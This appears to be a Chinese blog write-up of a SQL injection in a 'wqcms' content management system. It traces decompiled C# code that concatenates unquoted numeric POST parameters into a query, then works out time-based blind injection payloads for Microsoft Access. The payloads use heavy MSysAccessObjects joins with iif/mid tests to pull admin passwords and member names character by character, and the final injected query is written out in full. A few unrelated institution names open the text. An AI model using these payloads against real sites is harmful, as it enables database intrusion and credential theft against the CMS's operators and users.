威尔克通信实验室
国家数据通信工程技术研究中心
信息产业数据通信产品质量监督检验中心
北京通和实益电信科学技术研究所有限公司
反编译后,注入跟进说明:
private void
xaef3235cdd23255e()
{
string text = base.Server.UrlDecode(base.Request.Form["cid"]);
while (true)
{
IL_3E0:
string str =
base.Server.UrlDecode(base.Request.Form["aid"]);
string text2 =
"{\"result\":";
bool flag;
string[] array;
if
(string.IsNullOrEmpty(text))
{
if
(false)
{
break;
}
goto
IL_26;
}
else
{
if
(int.Parse(text) <= 0)
{
goto IL_26;
}
flag =
true;
if ((flag ? 1u
: 0u) >= 0u)
{
text2 += "1,\"data\":[";
array = new string[5];
array[0]
= "select e.ID,eName,vName,eCss from wqcms_expand e left join wqcms_extval
v on v.eID=e.ID where nID=";
array[1] = WbText.SqlEncode(str);
goto IL_391;
urldecode的作用我就不用多说了吧,Request.Form就是post获取,IsNullOrEmpty是判断变量是否为NULL或者为空
array = new
string[5];
array[0] = "select e.ID,eName,vName,eCss from wqcms_expand e left join
wqcms_extval v on v.eID=e.ID where nID=";
array[1] = WbText.SqlEncode(str);
goto IL_391;
这里的sql语句就不说了,数组array1中的sqlencode我们跟进一下是什么操作
public static
string SqlEncode(string str)
{
str = str.Replace("'", "''");
return str;
}
把一个单引号替换成两个单引号并赋于str最后return,首先想到的是不能用单引号了但是这里的sql操作语句是链接形式的未有单引号保护,接着看
IL_391:
array[2] = " and
clsID=";
goto IL_372;
IL_2AF:
object[]
array3;
array3[2] =
dataReader["ID"];
if ((flag ? 1u
: 0u) > 4294967295u)
{
goto
IL_391;
}
这里的array2是继续链接语句然后一个goto
IL_372:
if (!false)
{
array[3] = WbText.SqlEncode(text);
array[4] = " order by eSort asc";
cmdText =
string.Concat(array);
goto
IL_34E;
}
最后text又进入了那个替换单引号的函数并再次进行链接语句接着又goto
IL_34E:
dataReader =
this.dbHelper.ExecuteReader(CommandType.Text, cmdText, new IDataParameter[0]);
goto IL_1C0;
ExecuteReader是直接sql语句查询也就是执行sql,最后的sql语句原型就是:
select e.ID,eName,vName,eCss from cms_expand e left join cms_extval v on v.eID=e.ID where nID=1 and cisid=1 order by eSort asc
nid为注入所在
这里是sql server的语句,最初想过盲注但没有去深入,一直想的是sql server报错注入(太过于执着),这里的语句是根据回显的盲注,但是因为这个注入发生表的问题里面有数据的站实在是太少了,所以根据回显是几乎很尴尬的,那么只有基于时间来注入了,sql server下的延时我很清楚所以就没去太过于仔细的研究但是access的延时说实话我了解的很少,接着说下大佬紧接着给的另一条语句用于access没有数据时的延时注入
and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12,MSysAccessObjects AS T13,MSysAccessObjects AS T14,MSysAccessObjects AS T15)<>0 and (select top 1 asc(mid(s_pwd,1,1)) from admin where id=1)=ascii
这里其实是有问题的,在本地以及在实际环境中测试的时候都会爆错,于是自己修改成功延时,不过这里的延时注入是不带任何判断性的,也就是每请求一次都会延时所以没法正常判断某个值是不是真的存在所以自己再研究修改最终语句如下:
(select iif(mid(name,1,1)="a",(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from wqcms_member where id =1)
完整的sql原型+注入语句如下:
select e.ID,eName,vName,eCss from wqcms_expand e left join wqcms_extval v on v.eID=e.ID where nID=(select iif(mid(name,1,1)="a",(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from wqcms_member where id =1)and clsID=1 order by eSort